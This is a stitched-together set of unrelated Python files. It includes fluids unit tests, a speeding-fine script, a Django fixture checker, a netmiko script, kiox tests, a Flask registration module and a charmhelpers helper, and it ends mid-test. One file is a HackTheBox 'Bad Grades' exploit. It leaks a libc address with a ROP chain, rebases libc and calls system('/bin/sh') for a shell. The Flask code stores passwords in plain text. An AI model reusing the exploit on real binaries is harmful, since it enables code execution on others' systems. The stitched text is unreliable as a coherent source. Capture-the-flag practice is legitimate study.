type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose1d(value, magnitude, units, rtol=1e-7, atol=0): assert_close1d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose2d(value, magnitude, units, rtol=1e-7, atol=0): assert_close2d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def test_in_right_units(): assert u.default_system == 'mks' def test_nondimensional_reduction(): Re = 171.8865229090909 *u.meter * u.pound / u.centipoise / u.foot ** 2 / u.second eD = 0.0005937067088858105*u.inch/u.meter assert_close(friction_factor(Re, eD).magnitude, 0.012301598061848239) def test_convert_input(): from fluids.units import convert_input ans = convert_input(5, 'm', u, False) assert ans == 5 with pytest.raises(Exception): convert_input(5, 'm', u, True) def test_sample_cases(): Re = Reynolds(V=3.5*u.m/u.s, D=2*u.m, rho=997.1*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(Re.to_base_units().magnitude, 6979700.0) assert dict(Re.dimensionality) == {} # vs = hwm93(5E5*u.m, 45*u.degrees, 50*u.degrees, 365*u.day) # vs_known = [-73.00312042236328, 0.1485661268234253] # for v_known, v_calc in zip(vs_known, vs): # assert_close(v_known, v_calc.to_base_units().magnitude) # assert dict(v_calc.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = API520_A_g(m=24270*u.kg/u.hour, T=348.*u.K, Z=0.90, MW=51.*u.g/u.mol, k=1.11, P1=670*u.kPa, Kb=1, Kc=1) assert_close(A.to_base_units().magnitude, 0.00369904606468) assert dict(A.dimensionality) == {u'[length]': 2.0} T = T_critical_flow(473*u.K, 1.289) assert_close(T.to_base_units().magnitude, 413.280908694) assert dict(T.dimensionality) == {u'[temperature]': 1.0} T2 = T_critical_flow(473*u.K, 1.289*u.dimensionless) assert 
T == T2 with pytest.raises(Exception): T_critical_flow(473, 1.289) with pytest.raises(Exception): T_critical_flow(473*u.m, 1.289) # boolean P1 = 8*u.bar + 1*u.atm P2 = 1*u.atm assert True == is_critical_flow(P1, P2, k=1.4*u.dimensionless) A = size_control_valve_g(T=433.*u.K, MW=44.01*u.g/u.mol, mu=1.4665E-4*u.Pa*u.s, gamma=1.30, Z=0.988, P1=680*u.kPa, P2=310*u.kPa, Q=38/36.*u.m**3/u.s, D1=0.08*u.m, D2=0.1*u.m, d=0.05*u.m, FL=0.85, Fd=0.42, xT=0.60) assert_close(A.to_base_units().magnitude, 0.0201629570705307) assert dict(A.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} A = API520_round_size(A=1E-4*u.m**2) assert_close(A.to_base_units().magnitude, 0.00012645136) assert dict(A.dimensionality) == {u'[length]': 2.0} SS = specific_speed(0.0402*u.m**3/u.s, 100*u.m, 3550*u.rpm) assert_close(SS.to_base_units().magnitude, 2.3570565251512066) assert dict(SS.dimensionality) == {u'[length]': 0.75, u'[time]': -1.5} v = Geldart_Ling(1.*u.kg/u.s, 1.2*u.kg/u.m**3, 0.1*u.m, 2E-5*u.Pa*u.s) assert_close(v.to_base_units().magnitude, 7.467495862402707) assert dict(v.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} s = speed_synchronous(50*u.Hz, poles=12) assert_close(s.to_base_units().magnitude, 157.07963267948966) assert dict(s.dimensionality) == {u'[time]': -1.0} t = t_from_gauge(.2, False, 'AWG') assert_close(t.to_base_units().magnitude, 0.5165) assert dict(t.dimensionality) == {u'[length]': 1.0} dP = Robbins(G=2.03*u.kg/u.m**2/u.s, rhol=1000*u.kg/u.m**3, Fpd=24/u.ft, L=12.2*u.kg/u.m**2/u.s, rhog=1.1853*u.kg/u.m**3, mul=0.001*u.Pa*u.s, H=2*u.m) assert_close(dP.to_base_units().magnitude, 619.662459344 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(dP.to_base_units().magnitude, 1438.28269588 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, 
voidage=0.4*u.dimensionless, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s, Dt=0.01*u.m) assert_close(dP.to_base_units().magnitude, 1255.16256625) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} n = C_Chezy_to_n_Manning(26.15*u.m**0.5/u.s, Rh=5*u.m) assert_close(n.to_base_units().magnitude, 0.05000613713238358) assert dict(n.dimensionality) == {u'[length]': -0.3333333333333333, u'[time]': 1.0} Q = Q_weir_rectangular_SIA(0.2*u.m, 0.5*u.m, 1*u.m, 2*u.m) assert_close(Q.to_base_units().magnitude, 1.0408858453811165) assert dict(Q.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} t = agitator_time_homogeneous(D=36*.0254*u.m, N=56/60.*u.revolutions/u.second, P=957.*u.W, T=1.83*u.m, H=1.83*u.m, mu=0.018*u.Pa*u.s, rho=1020*u.kg/u.m**3, homogeneity=.995) assert_close(t.to_base_units().magnitude, 15.143198226374668) assert dict(t.dimensionality) == {u'[time]': 1.0} K = K_separator_Watkins(0.88*u.dimensionless, 985.4*u.kg/u.m**3, 1.3*u.kg/u.m**3, horizontal=True) assert_close(K.to_base_units().magnitude, 0.07951613600476297, rtol=1e-2) assert dict(K.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = current_ideal(V=120*u.V, P=1E4*u.W, PF=1, phase=1) assert_close(A.to_base_units().magnitude, 83.33333333333333) assert dict(A.dimensionality) == {u'[current]': 1.0} fd = friction_factor(Re=1E5, eD=1E-4) assert_close(fd.to_base_units().magnitude, 0.01851386607747165) assert dict(fd.dimensionality) == {} K = Cv_to_K(2.712*u.gallon/u.minute, .015*u.m) assert_close(K.to_base_units().magnitude, 14.719595348352552) assert dict(K.dimensionality) == {} Cv = K_to_Cv(16, .015*u.m) assert_close(Cv.to_base_units().magnitude, 0.0001641116865931214) assert dict(Cv.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} Cd = drag_sphere(200) assert_close(Cd.to_base_units().magnitude, 0.7682237950389874) assert dict(Cd.dimensionality) == {} V, D = integrate_drag_sphere(D=0.001*u.m, rhop=2200.*u.kg/u.m**3, rho=1.2*u.kg/u.m**3, 
mu=1.78E-5*u.Pa*u.s, t=0.5*u.s, V=30*u.m/u.s, distance=True) assert_close(V.to_base_units().magnitude, 9.686465044063436) assert dict(V.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} assert_close(D.to_base_units().magnitude, 7.829454643649386) assert dict(D.dimensionality) == {u'[length]': 1.0} Bo = Bond(1000*u.kg/u.m**3, 1.2*u.kg/u.m**3, .0589*u.N/u.m, 2*u.m) assert_close(Bo.to_base_units().magnitude, 665187.2339558573) assert dict(Bo.dimensionality) == {} head = head_from_P(P=98066.5*u.Pa, rho=1000*u.kg/u.m**3) assert_close(head.to_base_units().magnitude, 10.000000000000002) assert dict(head.dimensionality) == {u'[length]': 1.0} roughness = roughness_Farshad('Cr13, bare', 0.05*u.m) assert_close(roughness.to_base_units().magnitude, 5.3141677781137006e-05) assert dict(roughness.dimensionality) == {u'[length]': 1.0} def test_custom_wraps(): A = A_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(A.to_base_units().magnitude, 0.004830198704894308) assert dict(A.dimensionality) == {u'[length]': 2.0} V = V_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(V.to_base_units().magnitude, 5.890486225480862e-06) assert dict(V.dimensionality) == {u'[length]': 3.0} # custom compressible flow model wrappers functions = [Panhandle_A, Panhandle_B, Weymouth, Spitzglass_high, Oliphant, Fritzsche] values = [42.56082051195928, 42.35366178004172, 32.07729055913029, 29.42670246281681, 28.851535408143057, 39.421535157535565] for f, v in zip(functions, values): ans = f(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, Tavg=277.15*u.K) assert_pint_allclose(ans, v, {u'[length]': 3.0, u'[time]': -1.0}) ans = IGT(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 48.92351786788815, {u'[length]': 3.0, u'[time]': -1.0}) ans = Muller(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 
60.45796698148659, {u'[length]': 3.0, u'[time]': -1.0}) nu = nu_mu_converter(rho=1000*u.kg/u.m**3, mu=1E-4*u.Pa*u.s) assert_pint_allclose(nu, 1E-7, {u'[length]': 2.0, u'[time]': -1.0}) mu = nu_mu_converter(rho=1000*u.kg/u.m**3, nu=1E-7*u.m**2/u.s) assert_pint_allclose(mu, 1E-4, {u'[time]': -1.0, u'[length]': -1.0, u'[mass]': 1.0}) SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m)[0] assert_pint_allclose(SA, 10.124375616183064, {u'[length]': 2.0}) SA, sideA_SA, sideB_SA, lateral_SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m) expect = [10.124375616183064, 5.062187808091532, 5.062187808091532, 0] for value, expected in zip([SA, sideA_SA, sideB_SA, lateral_SA], expect): assert_pint_allclose(value, expected, {u'[length]': 2.0}) m = isothermal_gas(rho=11.3*u.kg/u.m**3, fd=0.00185*u.dimensionless, P1=1E6*u.Pa, P2=9E5*u.Pa, L=1000*u.m, D=0.5*u.m) assert_pint_allclose(m, 145.484757, {u'[mass]': 1.0, u'[time]': -1.0}) def test_db_functions(): # dB ans = control_valve_noise_g_2011(m=2.22*u.kg/u.s, P1=1E6*u.Pa, P2=7.2E5*u.Pa, T1=450*u.K, rho=5.3*u.kg/u.m**3, gamma=1.22, MW=19.8*u.g/u.mol, Kv=77.85*u.m**3/u.hour, d=0.1*u.m, Di=0.2031*u.m, FL=None, FLP=0.792, FP=0.98, Fd=0.296, t_pipe=0.008*u.m, rho_pipe=8000.0*u.kg/u.m**3, c_pipe=5000.0*u.m/u.s, rho_air=1.293*u.kg/u.m**3, c_air=343.0*u.m/u.s, An=-3.8, Stp=0.2) # assert_pint_allclose(ans, 91.67702674629604, {}) def test_check_signatures(): from fluids.units import check_args_order for name in dir(fluids): obj = getattr(fluids, name) if isinstance(obj, types.FunctionType): if hasattr(obj, 'func_name') and obj.func_name == '<lambda>': continue # 2 if hasattr(obj, '__name__') and obj.__name__ == '<lambda>': continue # 3 check_args_order(obj) def test_differential_pressure_meter_solver(): m = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, 
mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(m, 7.702338035732167, {'[mass]': 1, '[time]': -1}) P1 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, m=m, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P1, 200000, {'[length]': -1, '[mass]': 1, '[time]': -2}) P2 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, m=m, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P2, 183000, {'[length]': -1, '[mass]': 1, '[time]': -2}) D2 = differential_pressure_meter_solver(D=0.07366*u.m, m=m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(D2, .05, {'[length]': 1}) def test_Tank_units_full(): T1 = TANK(L=3*u.m, D=150*u.cm, horizontal=True, sideA=None, sideB=None) # test all methods V = T1.V_from_h(0.1*u.m, 'full') assert_pint_allclose(V, 0.151783071377, u.m**3) h = T1.h_from_V(0.151783071377*u.m**3, method='brenth') assert_pint_allclose(h, 0.1, u.m) h = T1.h_from_V(0.151783071377*u.m**3, 'brenth') assert_pint_allclose(h, 0.1, u.m) # Check the table and approximations T1.set_table(dx=1*u.cm) assert 151 == len(T1.volumes) assert_pint_allclose1d(T1.heights[0:3], [0, 0.01, 0.02], u.m) T1.set_table(n=10) assert 10 == len(T1.volumes) T1.set_table(n=10*u.dimensionless) assert 10 == len(T1.volumes) T1.set_chebyshev_approximators(8, 8) T1.set_chebyshev_approximators(8*u.dimensionless, 8) T1.set_chebyshev_approximators(8, 8*u.dimensionless) assert 16 == len(T1.c_forward) assert 16 == len(T1.c_backward) # Check the properties assert_pint_allclose(T1.h_max, 1.5, u.m) assert_pint_allclose(T1.V_total, 5.301437602932776, u.m**3) assert_pint_allclose(T1.L_over_D, 2, u.dimensionless) 
assert_pint_allclose(T1.A_sideA, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_sideB, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_lateral, 14.1371669412, u.m**2) assert_pint_allclose(T1.A, 17.6714586764, u.m**2) def test_HelicalCoil_units(): C2 = HelicalCoil(Do=30*u.cm, H=20*u.cm, pitch=5*u.cm, Dt=2*u.cm) C3 = HelicalCoil(2*u.cm, 30*u.cm, 5*u.cm, 20*u.cm) for C1 in [C2, C3]: assert_pint_allclose(C1.Dt, 0.02, u.m) assert_pint_allclose(C1.Do, 0.3, u.m) assert_pint_allclose(C1.Do_total, 0.32, u.m) assert_pint_allclose(C1.pitch, 0.05, u.m) assert_pint_allclose(C1.H, 0.2, u.m) assert_pint_allclose(C1.H_total, 0.22, u.m) assert_pint_allclose(C1.N, 4, u.dimensionless) assert_pint_allclose(C1.tube_circumference, 0.942477796077, u.m) assert_pint_allclose(C1.tube_length, 3.7752126215, u.m) assert_pint_allclose(C1.surface_area, 0.237203604749 , u.m**2) assert_pint_allclose(C1.curvature, 0.06, u.dimensionless) assert_pint_allclose(C1.helix_angle, 0.0530019606897, u.radians) def test_ATMOSPHERE_1976_units(): five_km = ATMOSPHERE_1976(5000*u.m) assert_pint_allclose(five_km.T, 255.675543222, u.K) assert_pint_allclose(five_km.P, 54048.2861458, u.Pa) assert_pint_allclose(five_km.rho, 0.73642842078, u.kg/u.m**3) assert_pint_allclose(five_km.g, 9.79124107698, u.m/u.s**2) assert_pint_allclose(five_km.mu, 1.62824813536e-05, u.Pa*u.s) assert_pint_allclose(five_km.k, 0.0227319029514, u.W/u.K/u.m) assert_pint_allclose(five_km.v_sonic, 320.54551967, u.m/u.s) assert_pint_allclose(five_km.sonic_velocity(300*u.K), 347.220809082, u.m/u.s) # Test the staticmethod works alone assert_pint_allclose(ATMOSPHERE_1976.sonic_velocity(300*u.K), 347.220809082, u.m/u.s) # Check AttribtueError is property raised on __getstate__ for classes # as they now have a __getattr_ method import copy copy.copy(five_km) copy.deepcopy(five_km) def test_ATMOSPHERE_NRLMSISE00(): a = ATMOSPHERE_NRLMSISE00(Z=1E3*u.m, latitude=45*u.degrees, longitude=45*u.degrees, day=150*u.day) assert_pint_allclose(a.T, 
285.544086062, u.K) assert_pint_allclose(a.rho, 1.10190620264, u.kg/u.m**3) assert_pint_allclose(a.O2_density, 4.80470350725e+24, u.count/u.m**3) assert_pint_allclose(a.day, 12960000, u.day)
python
#: Speed limit in km/h above which a fine is charged.
VEL_MAX = 80
#: Fine rate, in R$ per km/h above the limit.
TAXA = 7.00


def calcular_multa(vel, vel_max=VEL_MAX, taxa=TAXA):
    """Return the fine for driving at ``vel`` km/h, or ``None`` if legal.

    Parameters
    ----------
    vel : float
        Measured vehicle speed in km/h.
    vel_max : float, optional
        Speed limit (defaults to ``VEL_MAX``).
    taxa : float, optional
        Fine per km/h over the limit (defaults to ``TAXA``).
    """
    if vel > vel_max:
        return (vel - vel_max) * taxa
    return None


def main():
    """Prompt for the vehicle speed and report any fine."""
    vel = float(input('Velocidade do veículo: '))
    multa = calcular_multa(vel)
    if multa is not None:
        print('Você ultrapassou o limite de velocidade! Pagar multa de R${:.2f}'.format(multa))
    print('Dirija com Cuidado!')


# Guard so importing this module does not trigger the interactive prompt.
if __name__ == "__main__":
    main()
python
import csv


def color(color, string):
    """Wrap *string* in the ANSI escape sequence for *color* (a code like '37')."""
    return '\033[1;{}m{}\033[0m'.format(color, string)


def white(string):
    """Return *string* colored white for terminal output."""
    return color('37', string)


def red(string):
    """Return *string* colored red for terminal output."""
    return color('91', string)


def green(string):
    """Return *string* colored green for terminal output."""
    return color('92', string)


def ddf_check_models(application_labels=None, exclude_application_labels=None,
                     csv_filename='ddf_compatibility_report.csv'):
    """Try to ``get()`` every model of the selected apps and report the outcome.

    Returns a ``(succeeded, errors)`` pair of dicts keyed by
    ``"app_label.ModelName"``; ``errors`` maps each key to the exception text.
    A console report is always printed; a CSV report is written when
    *csv_filename* is truthy.
    """
    # Imported lazily so this module can be imported without a configured
    # Django environment (the original file already imported `get` lazily).
    from django.db import transaction
    from django_dynamic_fixture import get
    from django_dynamic_fixture.django_helper import get_apps, get_models_of_an_app

    # None sentinels instead of mutable default arguments.
    application_labels = application_labels or []
    exclude_application_labels = exclude_application_labels or []

    succeeded = {}
    errors = {}
    for app_label in get_apps(application_labels, exclude_application_labels):
        for model_class in get_models_of_an_app(app_label):
            ref = '{}.{}'.format(app_label, model_class.__name__)
            try:
                # atomic() rolls the test row back even when creation succeeds
                # partway; one bad model must not poison the connection.
                with transaction.atomic():
                    get(model_class)
                succeeded[ref] = None
            except Exception as e:
                errors[ref] = '[{}] {}'.format(type(e), str(e))
    console_report(succeeded, errors)
    if csv_filename:
        csv_report(succeeded, errors, filename=csv_filename)
    return succeeded, errors


def console_report(succeeded, errors):
    """Print a colored summary of compatible and incompatible models."""
    print(green('\nModels that DDF can create using the default settings.\n'))
    for i, (ref, _) in enumerate(succeeded.items(), start=1):
        i = str(i).zfill(3)
        print(white('{}. {}: '.format(i, ref)) + green('succeeded'))

    print(red('\nModels that requires some customisation.\n'))
    for i, (ref, error) in enumerate(errors.items(), start=1):
        i = str(i).zfill(3)
        print(white('{}. {}: '.format(i, ref)) + red(error))


def csv_report(succeeded, errors, filename):
    """Write the compatibility report to *filename* as properly escaped CSV.

    Uses ``csv.writer`` so commas (or quotes) inside error messages no longer
    corrupt the file, as the previous hand-rolled ``','.join`` did.
    """
    with open(filename, 'w', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(['#', 'Model', 'Succeeded'])
        for i, ref in enumerate(succeeded, start=1):
            writer.writerow([i, ref, 'succeeded'])
        writer.writerow(['#', 'Model', 'Error'])
        for i, (ref, error) in enumerate(errors.items(), start=1):
            writer.writerow([i, ref, error])
python
#!/usr/bin/env python
"""Connect to every device listed in ~/.netmiko.yml and print its prompt."""
import pathlib

import yaml
from rich import print
from netmiko import ConnectHandler


def read_yaml(filename):
    """Return the parsed contents of the YAML file *filename*."""
    with open(filename, encoding="utf-8") as f:
        return yaml.safe_load(f)


if __name__ == "__main__":
    # Load the .netmiko.yml inventory from the user's home directory.
    # pathlib.Path picks the correct flavour for the host OS; the previous
    # explicit PosixPath raises NotImplementedError on Windows.
    netmiko_yml = pathlib.Path("~/.netmiko.yml").expanduser()
    my_devices = read_yaml(netmiko_yml)

    print()
    for device_name, device_dict in my_devices.items():
        # Group entries in the inventory are lists of names; skip them —
        # only dict entries are real device definitions.
        if isinstance(device_dict, list):
            continue
        print(f"Connecting to -> {device_name}")
        with ConnectHandler(**device_dict) as nc:
            print(nc.find_prompt())
        print()
    print()
    print()
python
# HTB - Bad Grades from pwn import * import struct p = process("./grades") # gdb.attach(p, "b *0x0401106") def make_double(address): val = p64(address).hex() return str(struct.unpack("d", bytes.fromhex(val))[0]) elf = ELF("./grades") libc = ELF("./libc.so.6") rop = ROP(elf) rop2 = ROP(libc) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') popRdi = rop.find_gadget(["pop rdi"])[0] puts_got = elf.got["puts"] puts_plt = elf.plt["puts"] main = 0x401108 p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(puts_got)) p.recvuntil(b']:') p.sendline(make_double(puts_plt)) p.recvuntil(b']:') p.sendline(make_double(main)) p.recvuntil(b'\n') leak = u64(p.recvuntil(b'\n').strip().ljust(8, b'\x00')) print(hex(leak), hex(libc.symbols["puts"])) libc.address = leak - libc.symbols["puts"] log.info("libc rebased to: " + hex(libc.address)) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') ret = rop2.find_gadget(["ret"])[0] popRdi = rop2.find_gadget(["pop rdi", "ret"])[0] system = libc.symbols["system"] sh = next(libc.search(b'/bin/sh\x00')) p.recvuntil(b']:') p.sendline(make_double(ret)) p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(sh)) p.recvuntil(b']:') p.sendline(make_double(system)) p.interactive()
python
from kiox.episode import Episode
from kiox.step import StepBuffer
from kiox.transition_buffer import UnlimitedTransitionBuffer
from kiox.transition_factory import (
    FrameStackTransitionFactory,
    SimpleTransitionFactory,
)

from .utility import StepFactory


def test_simple_transition_factory():
    """Each transition should link a step to its successor (None at the end)."""
    factory = StepFactory()
    episode = Episode(StepBuffer(), UnlimitedTransitionBuffer())
    steps = [episode.append_step(factory()) for _ in range(10)]

    transition_factory = SimpleTransitionFactory()
    for i, step in enumerate(steps):
        is_terminal = i == len(steps) - 1
        next_step = None if is_terminal else steps[i + 1]
        lazy_transition = transition_factory.create(
            step=step,
            next_step=next_step,
            episode=episode,
            duration=1,
            gamma=0.99,
        )
        if is_terminal:
            assert lazy_transition.next_idx is None
        else:
            assert lazy_transition.next_idx is steps[i + 1].idx
        assert lazy_transition.curr_idx is step.idx
        assert lazy_transition.multi_step_reward == step.reward
        assert lazy_transition.duration == 1


def test_frame_stack_transition_factory():
    """Frame-stacked transitions should also record the preceding frames."""
    factory = StepFactory(observation_shape=(1, 84, 84))
    episode = Episode(StepBuffer(), UnlimitedTransitionBuffer())
    steps = [episode.append_step(factory()) for _ in range(10)]

    transition_factory = FrameStackTransitionFactory(n_frames=3)
    for i, step in enumerate(steps):
        is_terminal = i == len(steps) - 1
        next_step = None if is_terminal else steps[i + 1]
        lazy_transition = transition_factory.create(
            step=step,
            next_step=next_step,
            episode=episode,
            duration=1,
            gamma=0.99,
        )
        if is_terminal:
            assert lazy_transition.next_idx is None
        else:
            assert lazy_transition.next_idx is steps[i + 1].idx
        # up to n_frames - 1 = 2 previous step indices, clipped at episode start
        expected_prev = [s.idx for s in steps[max(i - 2, 0):i]]
        assert lazy_transition.curr_idx is step.idx
        assert lazy_transition.multi_step_reward == step.reward
        assert lazy_transition.duration == 1
        assert lazy_transition.prev_frames == expected_prev
python
from flask import Flask, render_template, request, session, url_for, redirect
import pymysql.cursors
from appdef import app, conn


@app.route('/registerCustomer')
def registerCustomer():
    """Render the customer registration form."""
    return render_template('registerCustomer.html')


# Authenticates the customer registration
@app.route('/registerAuthCustomer', methods=['GET', 'POST'])
def registerAuthCustomer():
    """Create a new customer account from the submitted form.

    Re-renders the registration form with an error when the email is already
    taken; otherwise inserts the customer row and shows the index page.
    """
    # grab the submitted form fields
    email = request.form['email']
    name = request.form['name']
    # NOTE(review): passwords are stored in plain text; hash them (e.g.
    # werkzeug.security.generate_password_hash) before insertion.
    password = request.form['password']
    building_number = request.form['building_number']
    street = request.form['street']
    city = request.form['city']
    state = request.form['state']
    phone_number = request.form['phone_number']
    passport_number = request.form['passport_number']
    passport_expiration = request.form['passport_expiration']
    passport_country = request.form['passport_country']
    date_of_birth = request.form['date_of_birth']

    cursor = conn.cursor()
    # BUG FIX: query parameters must be a tuple — (email,) not (email),
    # which is just a parenthesized string.
    query = 'SELECT * FROM customer WHERE email = %s'
    cursor.execute(query, (email,))
    data = cursor.fetchone()
    if data:
        # the lookup returned a row, so this email is already registered
        cursor.close()  # BUG FIX: cursor was leaked on this branch
        error = "This user already exists"
        return render_template('registerCustomer.html', error=error)

    ins = 'INSERT INTO customer VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
    cursor.execute(ins, (email, name, password, building_number, street, city,
                         state, phone_number, passport_number,
                         passport_expiration, passport_country, date_of_birth))
    conn.commit()
    cursor.close()
    return render_template('index.html')


# Define route for register
@app.route('/registerAgent')
def registerAgent():
    """Render the booking-agent registration form."""
    return render_template('registerAgent.html')


@app.route('/registerAuthAgent', methods=['GET', 'POST'])
def registerAuthAgent():
    """Create a new booking-agent account from the submitted form."""
    email = request.form['email']
    password = request.form['password']
    booking_agent_id = request.form['booking_agent_id']

    cursor = conn.cursor()
    query = 'SELECT * FROM booking_agent WHERE email = %s'
    cursor.execute(query, (email,))
    data = cursor.fetchone()
    if data:
        cursor.close()
        error = "This user already exists"
        return render_template('registerAgent.html', error=error)

    ins = 'INSERT INTO booking_agent VALUES(%s, %s, %s)'
    cursor.execute(ins, (email, password, booking_agent_id))
    conn.commit()
    cursor.close()
    # BUG FIX: removed conn.close() — `conn` is the shared module-level
    # connection from appdef; closing it breaks every subsequent request.
    return render_template('index.html')


@app.route('/registerStaff')
def registerStaff():
    """Render the airline-staff registration form."""
    return render_template('registerStaff.html')


@app.route('/registerAuthStaff', methods=['GET', 'POST'])
def registerAuthStaff():
    """Create a new airline-staff account from the submitted form."""
    username = request.form['username']
    password = request.form['password']
    first_name = request.form['first_name']
    last_name = request.form['last_name']
    date_of_birth = request.form['date_of_birth']
    airline_name = request.form['airline_name']

    cursor = conn.cursor()
    query = 'SELECT * FROM airline_staff WHERE username = %s'
    cursor.execute(query, (username,))
    data = cursor.fetchone()
    if data:
        cursor.close()
        error = "This user already exists"
        return render_template('registerStaff.html', error=error)

    ins = 'INSERT INTO airline_staff VALUES(%s, %s, %s, %s, %s, %s)'
    cursor.execute(ins, (username, password, first_name, last_name,
                         date_of_birth, airline_name))
    conn.commit()
    cursor.close()
    # BUG FIX: removed conn.close() (same shared-connection issue as above).
    return render_template('index.html')
python
from spaceone.inventory.connector.aws_sqs_connector.connector import SQSConnector
python
#!/usr/bin/env python

# Copyright 2014-2015 Canonical Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#  http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import sys
import subprocess

from charmhelpers.core import hookenv


def default_execd_dir():
    """Return the default ``exec.d`` directory inside the charm tree."""
    return os.path.join(os.environ['CHARM_DIR'], 'exec.d')


def execd_module_paths(execd_dir=None):
    """Yield the full path of each module directory under *execd_dir*.

    Falls back to :func:`default_execd_dir` when no directory is given and
    yields nothing when the directory does not exist.
    """
    target_dir = execd_dir if execd_dir else default_execd_dir()
    if not os.path.exists(target_dir):
        return
    for entry in os.listdir(target_dir):
        candidate = os.path.join(target_dir, entry)
        if os.path.isdir(candidate):
            yield candidate


def execd_submodule_paths(command, execd_dir=None):
    """Yield the path of *command* inside each module that provides it.

    Only executable regular files are yielded.
    """
    for module_path in execd_module_paths(execd_dir):
        candidate = os.path.join(module_path, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            yield candidate


def execd_run(command, execd_dir=None, die_on_error=True, stderr=subprocess.STDOUT):
    """Run *command* for every module under *execd_dir* that defines it.

    Failures are logged via hookenv; when *die_on_error* is true the process
    exits with the failing script's return code.
    """
    for script in execd_submodule_paths(command, execd_dir):
        try:
            subprocess.check_output(script, stderr=stderr,
                                    universal_newlines=True)
        except subprocess.CalledProcessError as err:
            hookenv.log("Error ({}) running {}. Output: {}".format(
                err.returncode, err.cmd, err.output))
            if die_on_error:
                sys.exit(err.returncode)


def execd_preinstall(execd_dir=None):
    """Run ``charm-pre-install`` for each module within *execd_dir*."""
    execd_run('charm-pre-install', execd_dir=execd_dir)
python
"""Test the `crc` main function."""
from crc.bin.crc3 import crc

import os
import pytest  # noqa: F401
import sys

# Directory holding the test fixtures (enhancer BED, chromosomes, regions).
TEST_FILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), 'files'))
# Output directory where crc() writes its result files.
TEST_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests'))


def test_crc():
    """Test crc functionality.

    Runs the full crc() pipeline on the bundled fixtures, then checks the
    clique scores it wrote to disk against known-good values.
    """
    crc(
        '{}/test_enhancers.bed'.format(TEST_FILES_DIR),
        'HG19',
        '{}/Chromosomes/'.format(TEST_FILES_DIR),
        TEST_DIR,
        'test',
